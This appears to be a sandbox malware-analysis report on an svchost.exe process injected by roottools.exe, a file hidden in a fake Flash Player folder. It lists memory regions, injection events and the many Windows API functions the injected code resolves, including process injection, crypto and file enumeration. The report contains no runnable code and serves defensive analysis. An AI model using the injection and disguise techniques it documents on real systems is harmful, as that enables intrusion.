| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\windows\syswow64\svchost.exe |
| Command Line | C:\Windows\SysWOW64\svchost.exe -k netsvcs |
| Initial Working Directory | C:\Users\aETAdzjz\AppData\Roaming\ |
| Monitor | Start Time: 00:03:35, Reason: Child Process |
| Unmonitor | End Time: 00:10:13, Reason: Terminated by Timeout |
| Monitor Duration | 00:06:38 |
| Information | Value |
|---|---|
| PID | 0x5fc |
| Parent PID | 0x7a8 (c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A7C
0x
A84
0x
A88
0x
970
0x
A8C
0x
960
0x
964
0x
968
0x
96C
0x
7A0
0x
89C
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| imm32.dll | 0x00020000 | 0x0003dfff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00031fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000070000 | 0x00070000 | 0x0008bfff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| locale.nls | 0x00090000 | 0x000f6fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000110000 | 0x00110000 | 0x00110fff | Private Memory | Readable, Writable |
|
|
|
|
| rsaenh.dll | 0x00120000 | 0x0015bfff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000120000 | 0x00120000 | 0x0015ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000160000 | 0x00160000 | 0x0016dfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000160000 | 0x00160000 | 0x0016cfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000170000 | 0x00170000 | 0x001affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000001b0000 | 0x001b0000 | 0x001effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000220000 | 0x00220000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000260000 | 0x00260000 | 0x0029ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002a0000 | 0x002a0000 | 0x002dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002f0000 | 0x002f0000 | 0x0032ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000320000 | 0x00320000 | 0x0035ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000390000 | 0x00390000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003d0000 | 0x003d0000 | 0x0044ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000480000 | 0x00480000 | 0x004bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004f0000 | 0x004f0000 | 0x005effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000650000 | 0x00650000 | 0x0068ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000006b0000 | 0x006b0000 | 0x006effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000720000 | 0x00720000 | 0x0072ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000730000 | 0x00730000 | 0x008b7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000008c0000 | 0x008c0000 | 0x00a40fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000a50000 | 0x00a50000 | 0x00e42fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000e80000 | 0x00e80000 | 0x00ebffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000ee0000 | 0x00ee0000 | 0x00f1ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000f40000 | 0x00f40000 | 0x00f7ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000fa0000 | 0x00fa0000 | 0x00fdffff | Private Memory | Readable, Writable |
|
|
|
|
| svchost.exe | 0x00fe0000 | 0x00fe7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000ff0000 | 0x00ff0000 | 0x023effff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000023f0000 | 0x023f0000 | 0x0265ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002400000 | 0x02400000 | 0x0243ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002440000 | 0x02440000 | 0x0247ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002490000 | 0x02490000 | 0x024cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002530000 | 0x02530000 | 0x0256ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002580000 | 0x02580000 | 0x025bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000025e0000 | 0x025e0000 | 0x0265ffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x02660000 | 0x0292efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002930000 | 0x02930000 | 0x0296ffff | Private Memory | Readable, Writable |
|
|
|
|
| wow64cpu.dll | 0x746f0000 | 0x746f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x74700000 | 0x7475bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74760000 | 0x7479efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74880000 | 0x748bafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x748c0000 | 0x748d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x74dc0000 | 0x74dcbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x74dd0000 | 0x74e2ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x74e30000 | 0x74e8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x74e90000 | 0x74ea8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| psapi.dll | 0x74eb0000 | 0x74eb4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iertutil.dll | 0x74ec0000 | 0x750bafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msasn1.dll | 0x750c0000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x750d0000 | 0x75126fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x75130000 | 0x751bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75250000 | 0x75295fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x752a0000 | 0x7534bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wininet.dll | 0x75350000 | 0x75444fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x75450000 | 0x755abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x755b0000 | 0x7564cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x756e0000 | 0x7577ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x75780000 | 0x75789fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x75790000 | 0x7588ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| crypt32.dll | 0x758d0000 | 0x759ecfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x759f0000 | 0x75afffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x75b00000 | 0x75bcbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shell32.dll | 0x75c50000 | 0x76899fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76b60000 | 0x76beefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| urlmon.dll | 0x76c40000 | 0x76d75fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76d80000 | 0x76e6ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000076e70000 | 0x76e70000 | 0x76f69fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000076f70000 | 0x76f70000 | 0x7708efff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77090000 | 0x77238fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77270000 | 0x773effff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007ef9b000 | 0x7ef9b000 | 0x7ef9dfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ef9e000 | 0x7ef9e000 | 0x7efa0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Injection Type | Source Process | Source Os Thread ID | Injection Info | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x97c | address = 0x70000, size = 114688 |
|
1 | |
| Modify Memory | #7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x97c | address = 0x876c4, size = 4 |
|
1 | |
| Modify Memory | #7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x97c | address = 0x877d0, size = 4 |
|
1 | |
| Modify Memory | #7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x97c | address = 0x87d38, size = 4 |
|
1 | |
| Create Remote Thread | #7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x97c | address = 0x795bc |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x75a07a2f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x75a049d7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x75a089b3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x772b1f6e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x75a110b5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x75a034d5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7729e026 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x75a035b7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x75a1d9b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x75a02d3c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x772a45f5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x75a0dd0e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75a014e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x75a05a7e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x75a2d4c4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x75a0103d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x75a0170d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x75a01400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x75a05a96 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x75a1d9c8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x75a2d075 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x75a1d5cd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x75a05151 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x75a1ce2e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x75a017ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x75a0469b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x772e5f41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75a01809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75a01b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x75a01ae5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x75a01886 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75a01245 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x772e742b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75a07a10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75a011f8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x75a2830d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x75a03e8e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x75a0195e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x75a1d851 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x75a25c1e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x75a2c7ea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a8416b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a8414b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a841df |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a840fb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x75a05371 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x75a0418b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x75a044ab |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75a23b92 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x75a01b48 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x75a017d1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x772a2c42 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x75a0465a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x75a0192e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x75a1d4f7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x75a1052f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75a01986 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x75a04407 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x75a0111e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77292270 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75a04950 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x75a1ecbb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a844cf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75a01856 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x75a04173 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75a01282 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x75a054ee |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x772922b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x75a01b18 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x75a04442 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x75a015d6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x75a1d4dc |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x75a011a9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75a014c9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x75a04a2d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x75a1d9e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x75a059e2 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75a04435 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x75a01462 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x75a1c860 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75a03ed3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x75a04259 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x75a034c8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x75a034b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75a01222 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x75a0492b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x75a28baf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x75a2896c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x75a011c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x75a2735f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75a03f5c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x75a0424c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x75a016dd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75a01410 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x75a016c5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x75a010ff |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x75a0183e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x75a01136 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x75a04220 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x75a0110c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x75a0186e |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x757b49ea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x757b8deb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x757afbd1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x757b1218 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x772a25dd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x757a8a29 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x757a9f84 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x757b2e69 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x757b3e75 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75801a26 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x757a7809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x757b05ba |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x757a787b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x757b0b4a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x757ab17d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x757b6110 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x757ad156 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x757af350 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x757a9a55 |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x758d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x758e6c0e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x758dd718 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x756f469d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x756f45f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7570779b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x756f0e0c |
|
1 | |
